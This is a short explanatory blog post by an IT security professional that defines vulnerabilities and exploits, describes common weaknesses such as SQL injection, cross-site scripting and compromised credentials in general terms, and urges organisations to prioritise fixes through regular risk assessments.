We continuously read about cyber-attacks, hacks and data breaches. All those news and articles keep on referring to words like vulnerability and exploits. But do you really know the difference?
Unfortunately, even to the more technically sophisticated people, there is a misunderstanding between these terms. It is important for IT professionals, yet alone Cybersecurity professionals to understand them. Knowing the difference can empower them to protect against threats to their systems, and thus keeping the business safe.
What Is A Vulnerability?
Vulnerabilities are weaknesses in hardware, software, and even processes, within an environment.
They can provide an attacker with a way to bypass the security controls put into place.
Vulnerabilities may exist everywhere. From hardware devices, firmware, operating systems, modules, drivers, web applications, APIs, even in your physical security.
Tens of thousands of software bugs are discovered every year and responsible vendors typically publish patches to correct any bugs for known vulnerabilities.
Examples of Security Vulnerabilities
There are a number of security vulnerabilities, but some common ones are:
SQL Injection
Exploiting systems vulnerable to SQL injections attempt to gain access to database content via malicious code injection. A successful SQL injection can allow attackers to steal sensitive data, spoof identities, and participate in a collection of other harmful activities.
Cross-Site Scripting
Cross-site scripting (XSS) attack also injects malicious code into a website. However, a Cross-site scripting attack targets website users, rather than the actual website itself, which puts sensitive user information at risk of theft.
Security Misconfiguration
Any component of a security system that can be leveraged by attackers due to a configuration error can be considered a “Security Misconfiguration.”
Unpatched Software
Unpatched vulnerabilities allow attackers to run a malicious code by leveraging a known security bug that has not been patched. The adversary will try to probe your environment looking for unpatched systems, and then attack them directly or indirectly.
Compromised Credentials
An attacker can use compromised credentials to gain unauthorized access to a system in your network. The adversary will try to somehow intercept and extract passwords from unencrypted or incorrectly encrypted communication between your systems, or from unsecured handling by software or users. The adversary may also exploit reuse of passwords across different systems.
What Is An Exploit?
Exploit is the mean through which a vulnerability can be leveraged by hackers to force a system to behave unexpectedly.
It can be a sequence of commands or a piece of software if we are discussing about technical exploits.
Never forget that the human factor can always be exploited as well. Social engineering is about exploiting human psychology to gain access to systems or data.
Perfect Does Not Exist So Prioritize
You will not find a perfect environment, free of vulnerabilities, with no outdated systems, misconfigurations or untrained and negligent employees.
Be realistic on what is vulnerable in your environment against what is actually exploitable.
There is a key difference between these two. You probably lack the time, resources, budget, even strategy and proper vulnerability management to be able to address every vulnerability on each component of your environment continuously.
Understand which are the most critical areas you should direct your resources to first, by performing regular security risk assessments.
Conclusion
It is important for organizations to be able to answer questions like:
Are our systems vulnerable?
What are the specific vulnerabilities?
What is the value of those systems and the data they hold to the business?
How should we prioritize their protection?
Are there effective security controls in place?
What would the impact be of a successful exploitation of a vulnerability by an attacker to the business?
Information security maturity does not come overnight.
Dimitris is an Information Technology and Cybersecurity professional with more than 20 years of experience in designing, building and maintaining efficient and secure IT infrastructures.
Among others, he is a certified: CISSP, CISA, CISM, ITIL, COBIT and PRINCE2, but his wide set of knowledge and technical management capabilities go beyond these certifications. He likes acquiring new skills on penetration testing, cloud technologies, virtualization, network security, IoT and many more.